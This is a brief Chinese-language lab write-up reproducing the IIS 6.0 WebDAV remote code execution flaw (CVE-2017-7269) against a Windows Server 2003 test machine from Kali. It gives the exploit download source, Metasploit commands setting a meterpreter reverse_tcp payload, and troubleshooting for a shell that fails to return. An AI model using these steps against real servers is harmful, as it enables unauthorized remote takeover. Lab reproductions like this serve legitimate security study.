一.漏洞介绍
IIS6.0在Web服务扩展中开启WebDAV,webDAV服务存在缓冲区溢出漏洞,造成远程代码执行
二.漏洞影响
Windows Server 2003
三.复现过程
环境:kali(10.0.78.19)
Windows Server 2003(10.0.78.20)
1.打开Windows Server 2003中IIS的WebDAV
2.下载EXP
下载网址:https://github.com/zcgonvh/cve-2017-7269
将EXP复制到kali的/usr/share/metasploit-framework/modules/exploits/windows/iis目录下,方便之后的攻击
3.开始攻击
1.打开msf,进行配置
命令:use exploit/windows/iis/cve_2017_7269(使用我们下载的exp)
show options(修改配置)
set RHOSTS 10.0.78.20(设置靶机ip)
set HttpHost 10.0.78.20(设置靶机网址)
set payload windows/meterpreter/reverse_tcp(设置返回载荷)
入坑:
复制进去没有重新加载
这个是最重要的,重新加载后即可使用导入的exp
最后设置:
可以看到设置目标端口是80
2.因此我们用kali进行目标机端口扫描
80端口是开启的
3.执行
发现可以执行但是无法返回shell
在网上搜索资料,我的2003是中文版,应该换成英文版本就可以了
发现可利用的是R2,正好与msf的targets默认值0相匹配,所以不是targets的问题